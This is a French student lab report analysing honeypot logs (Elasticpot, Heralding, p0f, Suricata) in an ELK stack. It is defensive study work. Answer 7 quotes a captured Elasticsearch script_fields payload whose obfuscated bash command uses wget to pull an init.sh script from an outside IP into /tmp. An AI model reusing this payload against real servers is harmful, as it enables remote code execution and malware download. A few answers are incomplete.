# TP2 Docker ELK

## Réponses aux questions

### Elasticpot

1 - Quel est le service mis sous surveillance grâce au jeu de données tp2_docker_elk/resources/elasticpot.json ? (indice : regarder la signification du port).

`Les requêtes sont dirigées vers notre service Elasticsearch et c'est le port 9200 qui est visé donc le service`

2 -  Quelle est l’adresse IP ayant réalisé le plus d’activités ?

`L'adresse IP ayant réalisée le plus d'activité est : 62.210.10.77 avec un taux d'appartion de 10.8%`

3 - Donner l’adresse IP ciblée par l’adresse identifiée précédemment.

`L'adresse IP ciblée est : 167.172.104.173`

4 - Est-ce-que cette adresse IP est malveillante ? Si oui, prouvez-le grâce aux recherches OSINT.

`Nous avons pu voir que l'adresse IP 62.210.10.77 est malveillante.`

![image info](./assets/ipadress.png)

5 - Donner les dates et heures d’activité de cette adresse IP

`Voici les dates et heures d'activité de cette adresse IP`

![image info](./assets/mouje3.png)

6 - Isoler la requête envoyée par l’adresse IP identifiée. Que signifie cette requête ?

`La requête envoyée est : GET /_cat/indices. Cette requête signifie que l'attaquant tente d'accèder à la liste de nos index`

7 - Décoder (base64) et inspecter les données brutes (champ honeypot.raw) pour vérifier que le résultat obtenu correspond à celui de la question précédente.

- Requête RAW
`````
POST /_search?source HTTP/1.1
Host: 167.172.104.173:9200
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
Accept: ext/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Content-Length: 1072
Content-Type: application/json

{"query":{"filtered":{"query":{"match_all":{}}}},"script_fields":{"exp":{"script":"import java.util.*;\nimport java.io.*;\nString str = \"\";BufferedReader br = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(new String[] {\"/bin/bash\",\"-c\",((char)119+(char)103+(char)101+(char)116+(char)32+(char)104+(char)116+(char)116+(char)112+(char)58+(char)47+(char)47+(char)49+(char)56+(char)53+(char)46+(char)49+(char)56+(char)49+(char)46+(char)49+(char)48+(char)46+(char)50+(char)51+(char)52+(char)47+(char)69+(char)53+(char)68+(char)66+(char)48+(char)69+(char)48+(char)55+(char)67+(char)51+(char)68+(char)55+(char)66+(char)69+(char)56+(char)48+(char)86+(char)53+(char)50+(char)48+(char)47+(char)105+(char)110+(char)105+(char)116+(char)46+(char)115+(char)104+(char)32+(char)45+(char)80+(char)32+(char)47+(char)116+(char)109+(char)112+(char)47+(char)115+(char)115+(char)115+(char)111+(char)111+(char)111).toString() }).getInputStream()));StringBuilder sb = new StringBuilder();while((str=br.readLine())!=null){sb.append(str+\"|\");}sb.toString();"}},"size":1}
`````

8 - Filter les données sur ces événements "/bin/bash"

`Il y a 33 tentatives de commande malcieuse sur /bin/bash`

![image info](./assets/mouje11.png)

9 - Constituer la liste des 32 adresses IP malveillantes ayant tenté une exécution de code malveillant.

`Voici la liste des IP qui ont tenté une exécution de code malveillant :`

![image info](./assets/mouje5.png)

10 - Après nettoyage, décoder la ligne de commande et qualifier techniquement l’action malveillante

`Cette commande permet à l'attaquant d'aller chercher un script bash sur le serveur dont l'adresse ip 185.181.10.234`

![image info](./assets/mouje4.png)

### Heralding

1 - Quel est l’objectif du projet heralding ? (faire une recherche en sources ouvertes).

`````
Sometimes you just want a simple honeypot that collects credentials, nothing more. Heralding is that honeypot! 
Currently the following protocols are supported: ftp, telnet, ssh, http, https, pop3, pop3s, imap, imaps, 
smtp, vnc, postgresql and socks5.
`````

2 - Dans le jeu de données chargé, quelle est la liste des services (protocoles) testés par les attaquants ?

`Nous avons trouvé un seul service est c'est VNC qui est testé par les attaquants`

3 - Pour le service VNC, quel mot de passe a été testé le plus souvent ?

`Le mot de passe testé le plus souveant est password comme la liste ci dessous :`

![image info](./assets/mouje6.PNG)

4 - Combien de mots de passe uniques ont été testés ?

`Il y a 1209 mot de passe uniques qui ont été testés`

### P0F

1 - Quel est l’objectif du projet p0f ? (faire une recherche en sources ouvertes).

`````
p0f (« passive OS fingerprinting ») est un logiciel permettant de faire de la détection de systèmes 
d’exploitation de manière passive, par écoute du réseau.
`````

2 - Quelle est la liste des 10 premiers services les plus observés ?

`Voici la liste des 10 premiers services les plus observés :`

![image info](./assets/mouje7.PNG)

3 - A quoi correspondrait le port 64295 ?

`C'est le port auquel P0F se connecte pour récupérer les informations de la cible`

4 - Par conséquent, que pouvons-nous déduire sur la volonté de l’attaquant par rapport à ce port ?

`Il veut récupérer un maximum d'informations sur la cible`

### Suricata

1 - Quel est l’objectif du projet suricata ? (faire une recherche en sources ouvertes)

`Suricata est un logiciel open source de détection d'intrusion, de prévention d'intrusion, et de supervision de sécurité réseau. Il est développé par la fondation OISF. Suricata permet l'inspection des Paquets en Profondeur`

2 - Quelle est la liste des événements observés ? (champ event_type)

`Voici la liste des 10 premiers évènements observés : `

![image info](./assets/mouje8.png)

3 - Concernant les événements de type "ftp", à quoi correspond la commande saisie par les attaquants ?

`Les attaquants essayent de se connecter au serveur FTP en tant qu'utilisateur anonyme`

![image info](./assets/mouje9.png)

4 - Concernant les événements de type "snmp", quel est le nom de communauté utilisé ? A quoi correspond-il ? Que pouvons-nous déduire sur la volonté de l’attaquant par rapport à ce port ?

`Le nom de communauté utilisé c'est public`
``

5 - Concernant les événements de type "http", à quoi correspond les activités de type "check.proxyradar.com" ?

`Les activités de ce type signifient que les attaquants cachent leur adresse IP derrière le réseau de proxy radar`

6 - Concernant les événements de type "dns", que signifie les activités dns.rrname les plus importantes ?

`Voici la liste des 10 activités les plus importantes lors des évènements dns`

![image info](./assets/mouje10.png)